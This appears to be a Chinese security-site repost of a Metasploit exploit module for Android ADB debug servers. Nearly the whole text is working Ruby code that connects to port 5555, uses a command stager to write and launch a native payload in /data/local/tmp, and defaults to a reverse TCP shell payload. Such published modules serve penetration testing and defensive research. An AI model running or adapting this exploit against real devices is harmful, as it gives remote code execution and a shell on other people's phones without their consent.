首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Android ADB Debug Server Remote Payload Execution Exploit
来源:metasploit.com 作者:joev 发布时间:2016-01-25  
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
require 'rex/proto/adb'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
      'Description'    => %q{
        Writes and spawns a native payload on an android device that is listening
        for adb debug messages.
      },
      'Author'         => ['joev'],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
      'Platform'       => 'linux',
      'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
      'Targets'        => [
        ['armle',  {'Arch' => ARCH_ARMLE}],
        ['x86',    {'Arch' => ARCH_X86}],
        ['x64',    {'Arch' => ARCH_X86_64}],
        ['mipsle', {'Arch' => ARCH_MIPSLE}]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 01 2016'
    ))
  
    register_options([
      Opt::RPORT(5555),
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
    ], self.class)
  end
  
  def check
    setup_adb_connection do
      device_info = @adb_client.connect.data
      print_good "Detected device:\n#{device_info}"
      return Exploit::CheckCode::Vulnerable
    end
  
    Exploit::CheckCode::Unknown
  end
  
  def execute_command(cmd, opts)
    response = @adb_client.exec_cmd(cmd)
    print_good "Command executed, response:\n #{response}"
  end
  
  def exploit
    setup_adb_connection do
      device_data = @adb_client.connect
      print_good "Connected to device:\n#{device_data.data}"
      execute_cmdstager({
        flavor: :echo,
        enc_format: :octal,
        prefix: '\\\\0',
        temp: datastore['WritableDir'],
        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
        background: true,
        nodelete: true
      })
    end
  end
  
  def setup_adb_connection(&blk)
    begin
      print_status "Connecting to device..."
      connect
      @adb_client = Rex::Proto::ADB::Client.new(sock)
      blk.call
    ensure
      disconnect
    end
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD SCTP ICMPv6 Error Proc
·xWPE 1.5.30a-2.1 - Local Buffe
·Buffalo NAS Remote Shutdown
·Java Platform SE 6 U24 HtmlCon
·Linux Kernel - prima WLAN Driv
·BlueControl 3.5 SR5 Insecure L
·Glassfish Server - Arbitrary F
·Art Systems FluidDraw P5/S5 5.
·CesarFTP 0.99g - XCWD Denial o
·Linux Kernel REFCOUNT Overflow
·Android sensord Local Root Exp
·NetSchedScan 1.0 - Crash PoC
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved